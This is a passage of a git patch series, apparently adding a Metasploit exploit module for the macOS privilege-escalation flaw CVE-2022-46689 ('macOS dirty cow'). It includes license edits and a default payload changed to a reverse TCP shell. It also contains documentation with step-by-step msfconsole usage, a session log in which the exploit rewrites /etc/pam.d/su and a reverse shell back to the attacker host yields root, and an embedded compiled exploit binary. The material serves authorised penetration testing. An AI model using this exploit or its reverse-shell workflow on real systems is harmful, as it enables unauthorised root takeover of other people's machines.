CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY +TO YOU. In no event shall Apple's total liability to You for all +damages (other than as may be required by applicable law) under this +License exceed the amount of fifty dollars ($50.00). + +10. Trademarks. This License does not grant any rights to use the +trademarks or trade names "Apple", "Apple Computer", "Mac", "Mac OS", +"QuickTime", "QuickTime Streaming Server" or any other trademarks, +service marks, logos or trade names belonging to Apple (collectively +"Apple Marks") or to any trademark, service mark, logo or trade name +belonging to any Contributor. You agree not to use any Apple Marks in +or as part of the name of products derived from the Original Code or +to endorse or promote products derived from the Original Code other +than as expressly permitted by and in strict compliance at all times +with Apple's third party trademark usage guidelines which are posted +at http://www.apple.com/legal/guidelinesfor3rdparties.html. + +11. Ownership. Subject to the licenses granted under this License, +each Contributor retains all rights, title and interest in and to any +Modifications made by such Contributor. Apple retains all rights, +title and interest in and to the Original Code and any Modifications +made by or on behalf of Apple ("Apple Modifications"), and such Apple +Modifications will not be automatically subject to this License. Apple +may, at its sole discretion, choose to license such Apple +Modifications under this License, or on different terms from those +contained in this License or may choose not to license them at all. + +12. Termination. + +12.1 Termination. This License and the rights granted hereunder will +terminate: + +(a) automatically without notice from Apple if You fail to comply with +any term(s) of this License and fail to cure such breach within 30 +days of becoming aware of such breach; + +(b) immediately in the event of the circumstances described in Section +13.5(b); or + +(c) automatically without notice from Apple if You, at any time during +the term of this License, commence an action for patent infringement +against Apple; provided that Apple did not first commence +an action for patent infringement against You in that instance. + +12.2 Effect of Termination. Upon termination, You agree to immediately +stop any further use, reproduction, modification, sublicensing and +distribution of the Covered Code. All sublicenses to the Covered Code +which have been properly granted prior to termination shall survive +any termination of this License. Provisions which, by their nature, +should remain in effect beyond the termination of this License shall +survive, including but not limited to Sections 3, 5, 8, 9, 10, 11, +12.2 and 13. No party will be liable to any other for compensation, +indemnity or damages of any sort solely as a result of terminating +this License in accordance with its terms, and termination of this +License will be without prejudice to any other right or remedy of +any party. + +13. Miscellaneous. + +13.1 Government End Users. The Covered Code is a "commercial item" as +defined in FAR 2.101. Government software and technical data rights in +the Covered Code include only those rights customarily provided to the +public as defined in this License. This customary commercial license +in technical data and software is provided in accordance with FAR +12.211 (Technical Data) and 12.212 (Computer Software) and, for +Department of Defense purchases, DFAR 252.227-7015 (Technical Data -- +Commercial Items) and 227.7202-3 (Rights in Commercial Computer +Software or Computer Software Documentation). Accordingly, all U.S. +Government End Users acquire Covered Code with only those rights set +forth herein. + +13.2 Relationship of Parties. This License will not be construed as +creating an agency, partnership, joint venture or any other form of +legal association between or among You, Apple or any Contributor, and +You will not represent to the contrary, whether expressly, by +implication, appearance or otherwise. + +13.3 Independent Development. Nothing in this License will impair +Apple's right to acquire, license, develop, have others develop for +it, market and/or distribute technology or products that perform the +same or similar functions as, or otherwise compete with, +Modifications, Larger Works, technology or products that You may +develop, produce, market or distribute. + +13.4 Waiver; Construction. Failure by Apple or any Contributor to +enforce any provision of this License will not be deemed a waiver of +future enforcement of that or any other provision. Any law or +regulation which provides that the language of a contract shall be +construed against the drafter will not apply to this License. + +13.5 Severability. (a) If for any reason a court of competent +jurisdiction finds any provision of this License, or portion thereof, +to be unenforceable, that provision of the License will be enforced to +the maximum extent permissible so as to effect the economic benefits +and intent of the parties, and the remainder of this License will +continue in full force and effect. (b) Notwithstanding the foregoing, +if applicable law prohibits or restricts You from fully and/or +specifically complying with Sections 2 and/or 3 or prevents the +enforceability of either of those Sections, this License will +immediately terminate and You must immediately discontinue any use of +the Covered Code and destroy all copies of it that are in your +possession or control. + +13.6 Dispute Resolution. Any litigation or other dispute resolution +between You and Apple relating to this License shall take place in the +Northern District of California, and You and Apple hereby consent to +the personal jurisdiction of, and venue in, the state and federal +courts within that District with respect to this License. The +application of the United Nations Convention on Contracts for the +International Sale of Goods is expressly excluded. + +13.7 Entire Agreement; Governing Law. This License constitutes the +entire agreement between the parties with respect to the subject +matter hereof. This License shall be governed by the laws of the +United States and the State of California, except that body of +California law concerning conflicts of law. + +Where You are located in the province of Quebec, Canada, the following +clause applies: The parties hereby confirm that they have requested +that this License and all related documents be drafted in English. Les +parties ont exige que le present contrat et tous les documents +connexes soient rediges en anglais. + +EXHIBIT A. + +"Portions Copyright (c) 1999-2003 Apple Computer, Inc. All Rights +Reserved. + +This file contains Original Code and/or Modifications of Original Code +as defined in and that are subject to the Apple Public Source License +Version 2.0 (the 'License'). You may not use this file except in +compliance with the License. Please obtain a copy of the License at +http://www.opensource.apple.com/apsl/ and read it before using this +file. + +The Original Code and all software distributed under the License are +distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER +EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, +INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. +Please see the License for the specific language governing rights and +limitations under the License." \ No newline at end of file From 60379368690802263c07d2fc56bd2e08911e40e2 Mon Sep 17 00:00:00 2001 From: jheysel-r7 Date: Wed, 1 Feb 2023 16:54:04 -0500 Subject: [PATCH 3/8] Update LICENSE --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LICENSE b/LICENSE index d33db752e858..dab39016d2a1 100644 --- a/LICENSE +++ b/LICENSE @@ -140,7 +140,7 @@ Copyright: 1999-2007 Apple Inc. License: Apple Purpose: This source file is necessary for users to create a stand-alone executable to exploit CVE-2022-46689, a local privilege escalation vulnerability in - MacOSX versios macOS dirty cow + MacOSX versios (macOS dirty cow) Files: data/templates/to_mem_pshreflection.ps1.template Copyright: 2012, Matthew Graeber From 3c7cbf62e6c934f3e5ba1d74389512e458f0f657 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Wed, 1 Feb 2023 16:56:28 -0500 Subject: [PATCH 4/8] Updated default payload --- modules/exploits/osx/local/mac_dirty_cow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/mac_dirty_cow.rb b/modules/exploits/osx/local/mac_dirty_cow.rb index ff46ce1dbc92..889fd9d6f689 100644 --- a/modules/exploits/osx/local/mac_dirty_cow.rb +++ b/modules/exploits/osx/local/mac_dirty_cow.rb @@ -35,7 +35,7 @@ def initialize(info = {}) 'Platform' => 'osx', 'Arch' => ARCH_X64, 'DefaultTarget' => 0, - 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' }, + 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' }, 'Targets' => [ [ 'Mac OS X x64 (Native Payload)', {} ], ], From f4c5632b6daae7cefe959d3a82355d77e4e233b0 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Wed, 1 Feb 2023 17:04:26 -0500 Subject: [PATCH 5/8] Cleaned up license file --- LICENSE | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/LICENSE b/LICENSE index dab39016d2a1..140646765921 100644 --- a/LICENSE +++ b/LICENSE @@ -140,11 +140,7 @@ Copyright: 1999-2007 Apple Inc. License: Apple Purpose: This source file is necessary for users to create a stand-alone executable to exploit CVE-2022-46689, a local privilege escalation vulnerability in - MacOSX versios (macOS dirty cow) - -Files: data/templates/to_mem_pshreflection.ps1.template -Copyright: 2012, Matthew Graeber -License: BSD-3-clause + MacOSX versions (macOS dirty cow) Files: lib/anemone.rb lib/anemone/* From 4de5e44bdaa19ef4f17ced038e84ed60b51e2c43 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Thu, 2 Feb 2023 10:38:26 -0500 Subject: [PATCH 6/8] Documentation --- .../exploit/osx/local/mac_dirty_cow.md | 75 +++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 documentation/modules/exploit/osx/local/mac_dirty_cow.md diff --git a/documentation/modules/exploit/osx/local/mac_dirty_cow.md b/documentation/modules/exploit/osx/local/mac_dirty_cow.md new file mode 100644 index 000000000000..8abd634ca69d --- /dev/null +++ b/documentation/modules/exploit/osx/local/mac_dirty_cow.md @@ -0,0 +1,75 @@ +## Vulnerable Application +This vulnerability works against macOS 13.0.1 - 13.0 and macOS 12.6.1 - 10.15. This vulnerability is the +macOS equivalent of the Dirty Cow vulnerability and allows for an unprivileged user to execute code as root. + + +## Verification Steps +1. Start msfconsole. +1. Do: `use multi/handler`. +1. Set the `RHOST`, `PAYLOAD` options. +1. Do: `run`. +1. Execute the payload on the machine and obtain a user session. +1. Do: `use exploit/osx/local/mac_dirty_cow` +1. Set the `SESSION`, `LHOST`, `LPORT` options. +1. Do: `run`. +1. Receive a shell session as the `root` user. + +## Scenarios +### Mac OSX (Venture 13.0) +``` +msf6 > use multi/handler +[*] Using configured payload generic/shell_reverse_tcp +msf6 exploit(multi/handler) > set payload osx/x64/meterpreter/reverse_tcp +payload => osx/x64/meterpreter/reverse_tcp +msf6 exploit(multi/handler) > set lhost 172.16.199.1 +lhost => 172.16.199.1 +msf6 exploit(multi/handler) > run + +[*] Started reverse TCP handler on 172.16.199.1:4444 +[*] Transmitting first stager...(214 bytes) +[*] Transmitting second stager...(49152 bytes) +[*] Sending stage (810648 bytes) to 172.16.199.130 +[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:49801) at 2023-02-01 16:10:14 -0500 + +meterpreter > bg +[*] Backgrounding session 1... +msf6 exploit(multi/handler) > use exploit/osx/local/mac_dirty_cow +[*] Using exploit/osx/local/mac_dirty_cow +msf6 exploit(osx/local/mac_dirty_cow) > set session 1 +session => 1 +msf6 exploit(osx/local/mac_dirty_cow) > set lhost 172.16.199.1 +lhost => 172.16.199.1 +msf6 exploit(osx/local/mac_dirty_cow) > set lport 4446 +lport => 4446 +msf6 exploit(osx/local/mac_dirty_cow) > run + +[!] SESSION may not be compatible with this module: +[!] * incompatible session type: meterpreter +[*] Started reverse TCP handler on 172.16.199.1:4446 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[*] Writing '/tmp/.wNDx86' (17204 bytes) ... +[*] Writing '/tmp/.TKIGnTw0l' (51392 bytes) ... +[*] Executing exploit '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.DfoZanro' +[*] Exploit result: +Testing for 10 seconds... +RO mapping was modified +[*] Running cmd: +echo '/tmp/.wNDx86 & disown' | su +[*] Executing exploit (restoring) '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.aclP0u' +[*] Exploit result: +Testing for 10 seconds... +RO mapping was modified +[+] Deleted /tmp/.wNDx86 +[+] Deleted /tmp/.aclP0u +[+] Deleted /tmp/.DfoZanro +[+] Deleted /tmp/.TKIGnTw0l +[*] Command shell session 2 opened (172.16.199.1:4446 -> 172.16.199.130:49802) at 2023-02-01 16:10:54 -0500 + +options +/bin/sh: line 29: options: command not found +id +uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1) +uname -a +Darwin msfusers-Mac.local 22.0.0 Darwin Kernel Version 22.0.0: Tue May 24 20:31:35 PDT 2022; root:xnu-8792.0.50.111.3~5/RELEASE_X86_64 x86_64 +``` From 88caeddc8c263f05bac479c08cbe90ba06d978a3 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Thu, 2 Feb 2023 11:10:06 -0500 Subject: [PATCH 7/8] Fixed license --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LICENSE b/LICENSE index 140646765921..25e12701a92c 100644 --- a/LICENSE +++ b/LICENSE @@ -135,7 +135,7 @@ Purpose: The built result is used in: payloads/stages/windows/vncinject.rb payloads/stages/windows/x64/vncinject.rb -Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c +Files: external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c Copyright: 1999-2007 Apple Inc. License: Apple Purpose: This source file is necessary for users to create a stand-alone executable From 1f224fd2d369d4a3c58cff8cd4dc6ec7628b543b Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Thu, 2 Feb 2023 11:11:06 -0500 Subject: [PATCH 8/8] Rapid7 compiled binary --- data/exploits/CVE-2022-46689/exploit | Bin 0 -> 51392 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100755 data/exploits/CVE-2022-46689/exploit diff --git a/data/exploits/CVE-2022-46689/exploit b/data/exploits/CVE-2022-46689/exploit new file mode 100755 index 0000000000000000000000000000000000000000..f84c41276bf8c5138c7e84014af7e520c3adde85 GIT binary patch literal 51392 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